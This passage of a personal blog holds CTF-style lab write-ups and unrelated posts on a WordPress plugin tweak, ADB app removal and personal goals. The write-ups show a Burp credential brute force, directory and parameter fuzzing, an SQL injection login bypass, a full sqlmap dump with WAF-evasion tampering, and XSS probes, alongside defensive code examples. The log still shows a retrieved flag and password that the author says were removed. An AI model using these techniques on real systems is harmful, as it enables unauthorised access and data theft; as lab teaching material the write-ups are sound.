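One caveat on the web server side: with Apache's AddHandler application/x-httpd-php .php, a file is treated as PHP if .php appears anywhere among its extensions, so even shell.php.png would run. Binding the handler with SetHandler inside <FilesMatch "\.php$"> restricts execution to names that end in .php, which is what makes checking only the final extension sufficient.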

Day 3 – Christmas Chaos

This day very much follows the guide already outlined in the challenge, so I will keep this brief.

After starting the attack box and deploying the challenge, we first have a look at the website. It is a typical login form.

We launch Burp Suite, set the Firefox proxy to Burp and turn intercept on in the Burp Proxy. We put in some test credentials and send them. Burp intercepts the request and we can have a look at it.

In the HTTP history tab we send the request to Burp Intruder. In the Positions tab of Intruder we mark the positions. The two positions we need are the username and password values we had sent; with two lists, the Cluster bomb attack type tries every username with every password.

Then we move to the Payloads tab and enter the word lists suggested by the challenge. Switch between the two lists with the payload set drop-down.

After clicking Start Attack and dismissing the Community Edition warning, we look at the results. Only one response looks different (status code or length).

We disable intercept and try that set of credentials to log in. In the control panel we find the flag.

Day 4 – Santa’s Watching

After starting the attack box and deploying the challenge we can view the defaced site.

To solve the second question, read the documentation in the challenge; it tells you how to construct the required command.

Now we try to find the API endpoint of the forum with gobuster. As suggested we use -w to specify the dirbuster big word list. We add the .php extension with -x. This is not needed to solve the challenge; I just put it in there because most forum software is written in PHP, as were the previous challenges.

gobuster dir -u http://10.10.79.210/ -w /usr/share/wordlists/dirb/big.txt -x .php

In gobuster's output we find /api with a 301 status code: the server redirects the bare directory name to /api/ with a trailing slash. We pull the URL up in the browser.

It redirects to /api/, a folder on the server. It looks like the API only contains one endpoint, site-log.php.

The challenge tells us that the parameter for the endpoint is date. Usually we would have to find that out by fuzzing parameter names, or by reading documentation if the software running is known.

So we fuzz it with wfuzz:

wfuzz -c -z file,/opt/AoC-2020/Day-4/wordlist -u http://10.10.79.210/api/site-log.php?date=FUZZ

In the output we see that one of the results has a different response length, so that date returned something other than the default. We pull up the URL with that parameter.

http://10.10.79.210/api/site-log.php?date=20201125

That will give us the flag and complete this day.

Day 5 – Someone stole Santa’s gift list!

First we pull up the site in the browser.

I very much recommend that you play around a bit with the SQL injection training site also hosted on port 3000 if you are new to SQL injections.

Next we are supposed to guess the panel name. Trying a few things will hopefully lead you to santapanel.

Now we can use an SQL injection to bypass the login page. We use santa as username and ' or true; -- as password. The ' closes the string literal the password is meant to be inserted into. or true adds another condition to the WHERE clause; because AND binds tighter than OR, the condition becomes (username matches AND password matches) OR true, which is always true, so the password comparison becomes irrelevant. The ; ends the statement and -- turns the rest of the original query, including its closing quote, into a comment. Strictly speaking the query now matches every user, so which account we land in depends on which row the application reads first; here that is santa.

Our next task is to find out how many entries the gift table has and what Paul wants. We can use the same payload ' or true; -- again. This time it does not neutralise the password check but the kid's name, so the query returns the gift for every kid. Now it is just a matter of counting and finding Paul's gift.
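To see exactly what ' or true; -- does to the query, and why a parameterised query is immune, here is an added example for this writeup (not code from the page or the challenge) against an in-memory SQLite database, the engine sqlmap identifies below as the real backend. Table names, users, kids and gifts are constructed. It also shows the point made above: with the WHERE clause always true, the login returns the first user in the table whatever username was supplied.

```python
import sqlite3

# The payload used on the page, in both the password and the search field.
PAYLOAD = "' or true; --"


def build_db() -> sqlite3.Connection:
    """Constructed in-memory sample; names, gifts and passwords are made up
    and not the challenge's data."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('santa', 'correct-horse-battery-staple');
        INSERT INTO users VALUES ('elf', 'candycane');
        CREATE TABLE sequel (kid TEXT, gift TEXT);
        INSERT INTO sequel VALUES ('Paul', 'bike'), ('Anna', 'shoes'), ('Tom', 'book');
        """
    )
    return con


def vulnerable_login(con, username, password):
    """String concatenation: the password text becomes part of the SQL.
    With PAYLOAD the statement ends up as
      ... WHERE username = 'santa' AND password = '' or true; -- '
    AND binds tighter than OR, so the WHERE clause is true for every row
    and fetchone() hands back whichever user is stored first."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def safe_login(con, username, password):
    """Parameterised query: the driver passes the values separately from the
    SQL text, so the quote in the payload is just a character in a string."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = con.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def vulnerable_search(con, kid):
    """Same flaw in the gift search: the payload dumps the whole table."""
    sql = f"SELECT kid, gift FROM sequel WHERE kid = '{kid}'"
    return con.execute(sql).fetchall()


def safe_search(con, kid):
    return con.execute("SELECT kid, gift FROM sequel WHERE kid = ?", (kid,)).fetchall()


if __name__ == "__main__":
    con = build_db()
    print("normal login, wrong password:", vulnerable_login(con, "santa", "wrong"))
    print("injected login as santa:     ", vulnerable_login(con, "santa", PAYLOAD))
    print("injected login, any username:", vulnerable_login(con, "nobody", PAYLOAD))
    print("parameterised, same payload: ", safe_login(con, "santa", PAYLOAD))
    print("injected search dumps table: ", vulnerable_search(con, PAYLOAD))
    print("parameterised search:        ", safe_search(con, PAYLOAD))
```

The parameterised versions are the fix the application needs; a WAF that strips spaces, as the --tamper option further down works around, only buys time.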

The screenshot is intentionally cropped to not reveal the answers. What we can see is that the search term is transmitted in the URL as a GET parameter. This makes using a tool like sqlmap rather easy. So instead of manually dumping the database to look for the flag and admin password, we use sqlmap.

First we start Burp and switch the proxy in the browser to Burp. Then we reload the panel with a default search, like shoes. We send the request in the Burp proxy to Intruder, where we can save it to disk. This allows us to use the cookie of our session etc. with sqlmap.

sqlmap -r gift --dump-all --tamper=space2comment

-r gift points sqlmap to the file saved from burp. I named mine gift but you might have chosen a different name.

--dump-all asks it to dump all data it can find

--tamper=space2comment replaces spaces in the payloads with inline comments, a simple WAF evasion technique hinted at in the challenge. If you forget it, sqlmap will suggest it too.

While it is running, sqlmap will prompt you for input. See the full dump below for details.

root@ip-10-10-172-235:~# sqlmap -r gift --dump-all --tamper=space2comment
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.2.4#stable}
|_ -| . [,]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 02:09:08

[02:09:08] [INFO] parsing HTTP request from 'gift'
[02:09:08] [INFO] loading tamper script 'space2comment'
[02:09:08] [INFO] testing connection to the target URL
[02:09:08] [INFO] testing if the target URL content is stable
[02:09:09] [INFO] target URL content is stable
[02:09:09] [INFO] testing if GET parameter 'search' is dynamic
[02:09:09] [INFO] confirming that GET parameter 'search' is dynamic
[02:09:09] [INFO] GET parameter 'search' is dynamic
[02:09:09] [WARNING] heuristic (basic) test shows that GET parameter 'search' might not be injectable
[02:09:09] [INFO] testing for SQL injection on GET parameter 'search'
[02:09:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:09:09] [WARNING] reflective value(s) found and filtering out
[02:09:09] [INFO] GET parameter 'search' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="James")
[02:09:09] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL' 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[02:09:28] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[02:09:28] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[02:09:28] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[02:09:28] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[02:09:28] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[02:09:28] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[02:09:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:09:28] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:09:28] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[02:09:28] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[02:09:28] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[02:09:28] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[02:09:28] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:09:28] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[02:09:28] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[02:09:28] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[02:09:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[02:09:28] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[02:09:28] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:09:28] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[02:09:28] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[02:09:28] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[02:09:28] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[02:09:28] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[02:09:28] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[02:09:28] [INFO] testing 'MySQL inline queries'
[02:09:28] [INFO] testing 'PostgreSQL inline queries'
[02:09:28] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[02:09:28] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[02:09:28] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[02:09:28] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[02:09:28] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[02:09:28] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[02:09:28] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[02:09:28] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[02:09:28] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[02:09:28] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[02:09:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[02:09:28] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
[02:09:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (comment)'
[02:09:28] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (comment)'
[02:09:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[02:09:28] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[02:09:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[02:09:28] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[02:09:28] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query)'
[02:09:28] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query)'
[02:09:28] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query - comment)'
[02:09:28] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query - comment)'
[02:09:28] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[02:09:29] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[02:09:29] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[02:09:29] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[02:09:29] [INFO] testing 'MySQL AND time-based blind (ELT)'
[02:09:29] [INFO] testing 'MySQL OR time-based blind (ELT)'
[02:09:29] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[02:09:29] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[02:09:29] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[02:09:29] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[02:09:29] [INFO] testing 'Oracle AND time-based blind'
[02:09:29] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:09:29] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:09:29] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[02:09:29] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[02:09:29] [INFO] testing 'MySQL <= 5.0.11 time-based blind - Parameter replace (heavy queries)'
[02:09:29] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[02:09:29] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[02:09:29] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[02:09:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[02:09:29] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[02:09:29] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[02:09:29] [INFO] target URL appears to have 2 columns in query
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[02:09:34] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql') 
[02:09:34] [INFO] testing 'MySQL UNION query (39) - 1 to 20 columns'
[02:09:34] [INFO] testing 'MySQL UNION query (39) - 21 to 40 columns'
[02:09:35] [INFO] testing 'MySQL UNION query (39) - 41 to 60 columns'
[02:09:35] [INFO] testing 'MySQL UNION query (39) - 61 to 80 columns'
[02:09:36] [INFO] testing 'MySQL UNION query (39) - 81 to 100 columns'
[02:09:36] [INFO] checking if the injection point on GET parameter 'search' is a false positive
[02:09:36] [INFO] heuristics detected web page charset 'ascii'
[02:09:36] [WARNING] parameter length constraining mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 195 HTTP(s) requests:
---
Parameter: search (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: search=shoes%' AND 1839=1839 AND '%'='
---
[02:09:43] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[02:09:43] [INFO] testing MySQL
[02:09:43] [WARNING] the back-end DBMS is not MySQL
[02:09:43] [INFO] testing Oracle
[02:09:43] [WARNING] the back-end DBMS is not Oracle
[02:09:43] [INFO] testing PostgreSQL
[02:09:43] [WARNING] the back-end DBMS is not PostgreSQL
[02:09:43] [INFO] testing Microsoft SQL Server
[02:09:43] [WARNING] the back-end DBMS is not Microsoft SQL Server
[02:09:43] [INFO] testing SQLite
[02:09:43] [INFO] confirming SQLite
[02:09:43] [INFO] actively fingerprinting SQLite
[02:09:43] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[02:09:43] [INFO] sqlmap will dump entries of all tables from all databases now
[02:09:43] [INFO] fetching tables for database: 'SQLite_masterdb'
[02:09:43] [INFO] fetching number of tables for database 'SQLite_masterdb'
[02:09:43] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[02:09:43] [INFO] retrieved: 3
[02:09:43] [INFO] retrieved: users
[02:09:44] [INFO] retrieved: sequels
[02:09:45] [INFO] retrieved: hidden_table
[02:09:46] [INFO] retrieved: CREATE TABLE sequels (title text, kid text, age integer)
[02:09:54] [INFO] fetching entries for table 'sequels' in database 'SQLite_masterdb'
[02:09:54] [INFO] fetching number of entries for table 'sequels' in database 'SQLite_masterdb'
[02:09:54] [INFO] retrieved: 22
Database: SQLite_masterdb
Table: sequels
[22 entries]
+------+------+-------+
| kid  | age  | title |
+------+------+-------+
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
+------+------+-------+

[02:09:54] [INFO] table 'SQLite_masterdb.sequels' dumped to CSV file '/root/.sqlmap/output/10.10.112.21/dump/SQLite_masterdb/sequels.csv'
[02:09:54] [INFO] retrieved: CREATE TABLE hidden_table (flag text)
[02:10:00] [INFO] fetching entries for table 'hidden_table' in database 'SQLite_masterdb'
[02:10:00] [INFO] fetching number of entries for table 'hidden_table' in database 'SQLite_masterdb'
[02:10:00] [INFO] retrieved: 1
[02:10:00] [INFO] retrieved: thmfox{All_I_Want_for_Christmas_Is_You}
Database: SQLite_masterdb
Table: hidden_table
[1 entry]
+-----------------------------------------+
| flag                                    |
+-----------------------------------------+
| Here will be the flag                   |
+-----------------------------------------+

[02:10:05] [INFO] table 'SQLite_masterdb.hidden_table' dumped to CSV file '/root/.sqlmap/output/10.10.112.21/dump/SQLite_masterdb/hidden_table.csv'
[02:10:05] [INFO] retrieved: CREATE TABLE users (username text, password text)
[02:10:09] [INFO] fetching entries for table 'users' in database 'SQLite_masterdb'
[02:10:09] [INFO] fetching number of entries for table 'users' in database 'SQLite_masterdb'
[02:10:09] [INFO] retrieved: 1
[02:10:09] [INFO] retrieved: EhCNSWzzFP6sc7gB
[02:10:10] [INFO] retrieved: admin
Database: SQLite_masterdb
Table: users
[1 entry]
+----------+------------------+
| username | password         |
+----------+------------------+
| admin    | here password    |
+----------+------------------+

[02:10:10] [INFO] table 'SQLite_masterdb.users' dumped to CSV file '/root/.sqlmap/output/10.10.112.21/dump/SQLite_masterdb/users.csv'
[02:10:10] [WARNING] HTTP error codes detected during run:
400 (Bad Request) - 1 times
[02:10:10] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.112.21'

[*] shutting down at 02:10:10

In the dump you find the flag and password, but I removed them of course.

Day 6 – Be careful what you wish on a Christmas night

Again we launch both boxes and pull the website up in the browser.

First we get a bit of a feeling for the app by adding a few items and using the search.

Then we try a basic XSS payload in the fields: <script>alert('1')</script>. In the search field, this already triggers.

In the url bar we can see the parameter.

The same payload can be used in the new book field. This results in stored cross-site scripting: every time you reload the site, the popup comes up again.

For the next part we launch OWASP ZAP and give it a moment to update after it starts. Then we start an automated scan of our target.

Basically ZAP finds the two vulnerabilities we already discussed above.

Reload the site again and have a look at what ZAP added to the list. The testing is quite verbose.
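As an added illustration that is not part of the original writeup, here is a small Node.js stand-in for the wishlist app: the search echo (reflected) and the saved book list (stored) rendered with and without HTML output encoding, which is the fix ZAP's findings point at. The app code and sample entries are assumptions, since the challenge's real source is not shown.

```javascript
// Added example, not code from the original post: a stand-in for the Day 6
// wishlist app showing why <script>alert('1')</script> fires and how output
// encoding stops it. The app code and sample data are assumptions; the
// challenge's real source is not shown in the writeup.

const XSS_PAYLOAD = "<script>alert('1')</script>"; // the probe used above

// Escape the five characters that can end an HTML text or attribute context.
// This is an HTML encoder only; URL, JavaScript and CSS contexts need their own.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Reflected case: the search term from the query string is echoed back and
// also used to prefill the search box (attribute context).
function renderSearchVulnerable(q) {
  return `<input name="search" value="${q}"><p>Results for: ${q}</p>`;
}
function renderSearchSafe(q) {
  const e = escapeHtml(q);
  return `<input name="search" value="${e}"><p>Results for: ${e}</p>`;
}

// Stored case: titles saved via the "new book" field are rendered on every
// page load, so one bad entry hits every later visitor.
function renderBooksVulnerable(books) {
  return `<ul>${books.map((b) => `<li>${b}</li>`).join('')}</ul>`;
}
function renderBooksSafe(books) {
  return `<ul>${books.map((b) => `<li>${escapeHtml(b)}</li>`).join('')}</ul>`;
}

// Crude check used in the demo: does the markup contain a live <script> tag
// or an unescaped attribute breakout? Enough to make the difference visible.
function hasScriptInjection(html) {
  return /<script\b/i.test(html) || /"\s+on\w+=/i.test(html);
}

// Constructed sample data standing in for the challenge's wishlist entries.
const STORED_BOOKS = ['A Christmas Carol', XSS_PAYLOAD];
const ATTRIBUTE_PROBE = '" onfocus="alert(1)'; // breaks out of value="..." if not encoded

function demo() {
  return {
    reflectedVulnerable: hasScriptInjection(renderSearchVulnerable(XSS_PAYLOAD)),
    reflectedSafe: hasScriptInjection(renderSearchSafe(XSS_PAYLOAD)),
    attributeVulnerable: hasScriptInjection(renderSearchVulnerable(ATTRIBUTE_PROBE)),
    attributeSafe: hasScriptInjection(renderSearchSafe(ATTRIBUTE_PROBE)),
    storedVulnerable: hasScriptInjection(renderBooksVulnerable(STORED_BOOKS)),
    storedSafe: hasScriptInjection(renderBooksSafe(STORED_BOOKS)),
  };
}

console.log(demo());
```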

Excluding a Category from WordPress main page & RSS feed (quick & dirty)

I recently started a daily writing practice and, while just using the existing blog seemed to be the fastest way, I also did not want the posts in the main blog and RSS feed.

You can find the posts in the Notebook category. By default, WordPress does not let you exclude a category like that though.

Ultimate Category Excluder

The Ultimate Category Excluder (what a name) plugin lets you hide a category from the latest blog posts as well as RSS feeds. It is rather simple to configure and does what it says it does.

It does however hide the category from all RSS feeds. I wanted to have a feed for the category though, so people interested in following the notebook could subscribe. It also allows for syndication like in Rixx’s notebook collection.

Quick & Dirty fix

My goal was to set this up quickly and I was already considering just running a hugo or other static generator. That would have taken quite a bit of time to properly set up as well though.

But then I found a post on the plugin’s support forums that describes a quick & dirty fix. In line 152 (EDIT: the line changed to 157 with the current version) of /plugins/ultimate-category-excluder/ultimate-category-excluder.php change

if ( $query->is_feed ) {

to

if ( $query->is_feed && !$query->is_archive ) {

It works and, from a quick glance at the rest of the plugin’s code, should not have further side effects.

That change still comes with one drawback: I have to redo it every time the plugin is updated, and I can not rely on the integrity check for the plugin file since it always comes up as changed.

This can only be a short term solution and I would not recommend it for use in customer projects. I hope excluding a category only from the main feed will be added as a feature to the plugin, but if it is not, I will eventually have to write my own solution.

Uninstalling Preinstalled Android Apps without root

On my Moto G6 every update seems to re-enable the Outlook and LinkedIn apps I disabled on purpose. Apps that have been preinstalled by the manufacturer can not be uninstalled via the Play Store or the app settings, only disabled.

So far I have been disabling them after each update, but I have gotten quite annoyed by it and did a bit of research to find out how to fully uninstall them.

Prerequisites

What you need is the Android Debug Bridge (ADB) on your computer, and you need to enable USB debugging on the phone.

I use Windows in this guide, but there is a great guide over at XDA-Developers on how to set everything up on Windows, Mac & Linux that walks you through the process.

USB Debugging on the Phone

If you haven’t enabled the Developer Mode on your phone yet, you have to navigate to Settings, then System -> About and scroll down to the build number. Tap this 7 times to enable Developer mode.

Then you will find the Developer Settings in the System Settings menu. Go there and enable USB debugging.

ADB on Windows

Setting up ADB on Windows is straightforward. Download the latest ADB version, extract the files from the zip and navigate in Powershell to the extracted folder.

Tip: You can hold down SHIFT when right-clicking in Explorer and use “Open Powershell here”

From here you can run the adb commands. Since we did not add the folder to the PATH we will have to preface the command with .\ to make it use the adb.exe in this folder.

If you follow this guide on a different OS or have ADB in your PATH you don’t have to use the .\

Connecting the Phone

Connect the phone via USB and double check that USB debugging is enabled.

Then you check for connected devices:

.\adb devices                                  

This starts up the ADB service and lists connected devices:

* daemon not running; starting now at tcp:5037
* daemon started successfully
List of devices attached
ZY322XXXX      unauthorized

On your phone you should get a pop-up asking you to confirm the ADB connection to the computer. After accepting it,

.\adb devices                                  

should no longer list your device as unauthorized:

List of devices attached
ZY322XXXX      device

Listing the Apps

.\adb shell pm list packages

Prints out a long list of all installed apps. You can use this list to find the full name of the apps you want to uninstall.

...
package:com.google.android.apps.inputmethod.zhuyin
package:com.microsoft.office.outlook
package:com.google.zxing.client.android
package:com.qualcomm.qti.dynamicddsservice
package:com.google.android.setupwizard
package:eu.siacs.conversations.legacy
package:com.qualcomm.qcrilmsgtunnel
...
package:com.keylesspalace.tusky
package:com.motorola.msimsettings
package:com.android.bookmarkprovider
package:com.linkedin.android
package:com.android.settings
package:com.motorola.arselfie
package:com.qualcomm.qti.lpa
package:com.qualcomm.qti.uim
package:com.google.android.inputmethod.pinyin
...

While you can uninstall most apps like LinkedIn and Outlook, you should be more careful with system apps.

Uninstalling the App

.\adb shell pm uninstall --user 0 [Package Name]

Will uninstall the app. So in my case I just had to issue

.\adb shell pm uninstall --user 0 com.microsoft.office.outlook

and

.\adb shell pm uninstall --user 0 com.linkedin.android

Once ADB returns Success, you can unplug your device and are done.

Remember to disable USB Debugging again in your Developer Settings.

Goals: April 2019

I’m usually not a huge fan of making resolutions because I get far too easily into the habit of letting them slip. Because everyone does, right?

But on the other hand, having no goals is not a good thing either. So I’m going to put a bit of pressure on myself by publicly declaring my (non work related) goals for the month.

Blog Stuff

Both as in blogging stuff as well as doing blog related stuff. So what exactly?

  • at least 2 more blog posts
  • make sure everything is GDPR compliant
  • write an about page
  • a few minor tweaks

Reading

I want to finish at least one book on my reading list and make progress on the others:

My reading List in a picture

The Go Programming Language – Donovan & Kernighan

A basic, but rather technical introduction to Go for people who already know how to program in other languages.

I’m using a lot of tools written in Go for work, and for a curious mind like me this leads to wanting a better understanding of the language. Usually my brain is pretty roasted after taking care of the baby and work, so I don’t expect to make much progress in this one.

How to solve it – Polya

This is a classic and a recommended read for everyone in a scientific field or for teachers.

Funnily enough it was recommended to me by my math teacher, by the math professor while I was studying chemical biology, and by my math professor in the computer science classes. But the first two of them were so unlikable that I discarded pretty much everything they recommended. Not to my benefit.

I did read it in my first year of CS at the university and it is a great book. I’m rereading it with two goals in mind:

  • Getting a better grasp of English math terms (reading it in English now, not German as before)
  • Being reminded of the lessons for teachers, so I can explain things better once my daughter is old enough

New solutions for Cybersecurity – Shrobe, Shrier, Pentland

This is a collection of articles about cybersecurity. I haven’t read anything in it yet, despite buying it close to the release early last year. It got mentioned quite positively in many security podcasts and conversations with colleagues.

There is not even a good reason why I have not read it yet, other than not finding the time for it.

Tribe of hackers – Carey, Jin

Here we have an interview collection with well-known hackers. I’m only a few interviews in, but so far it has been very interesting. Each interview is rather short, so it fits my short time slots when the baby is busy rather well.

Kindle

Mostly for reading along with SciFi audiobooks. I’m currently on Ryk Brown’s Frontier saga. But of course an occasional smut book sneaks on there as well.

Wrap up Gaming side projects

I won’t go into details here but I have a rather high number of unfinished gaming related side projects. From updated websites to Star Citizen training modules. I really have to consolidate my commitments in that area. It is getting too much for my currently available free time.

Of course finishing things takes time, but if it goes well, I should have more free time again next month.

Fitness & Diet

I used to work out & train every day as a kid and young adult, then dropped the habit when I went to university. It was not exactly a healthy life until about 3 years ago, when I started regular workouts again.

But in the last 2 months, since my wife is back at work and I’m alone with the baby, I have lacked both opportunity and motivation for workouts. In addition, I picked up some unhealthy eating habits.

I tried 5 min HIIT workouts last month but being sick for a week got me off track again. So, one more try this month!

Since I added about 3kg of extra weight in the last 2 months, I’ll also put myself on intermittent fasting once more. It already served me well when getting back into shape 3 years ago.

Will it work?

I have no clue, but it does not seem unrealistic at least. I do need more focus on my goals in my life so this is a start. I’ll tell you in a month how it went.

Poggie

Dusting off the Blog

Photo by Steven Depolo: https://www.flickr.com/photos/stevendepolo/3283663724/

Gosh has it been a while since I started this blog and I only made it to two, now rather outdated posts. Not exactly what I had in mind back then but this is where it is now.

Every time a WordPress update came along or other maintenance tasks had to be done, I wondered if I should just get rid of it, but that never felt right. I might return to writing some day.

I guess that day has come!

Writing has always been a way to structure my mind. There probably are several dozen of draft blog posts on my hard drive and while I never got to touching them up well enough for publication, they all served their purpose at the time of writing: They allowed me to reflect on the topic and get my thoughts in order.

What to expect

The tagline of the blog used to be

security. code. games. learning

That described my goals pretty well but, like I said, nothing much came of it. Life has changed quite a bit, so I adjusted that as well.

security. code. parenting. learning. games.

Security

Eventually I want to get back to some non-NDA security research in my free time, so this stays there for now, even if I don’t expect many security posts to come this year. With changing projects, I’m pretty sure that will change as well.

Code

Like with security, there probably won’t be that many coding related posts in the near future, but security and code to me pretty much go hand in hand. Since I have a few side projects in mind for the next months, there might be something ending up here.

Parenting

We have an 11-month-old daughter and I am her main caretaker. So naturally a lot of what is on my mind is related to her and how to be a good parent. I don’t intend to post everyday stories but to discuss overarching themes and struggles.

Learning

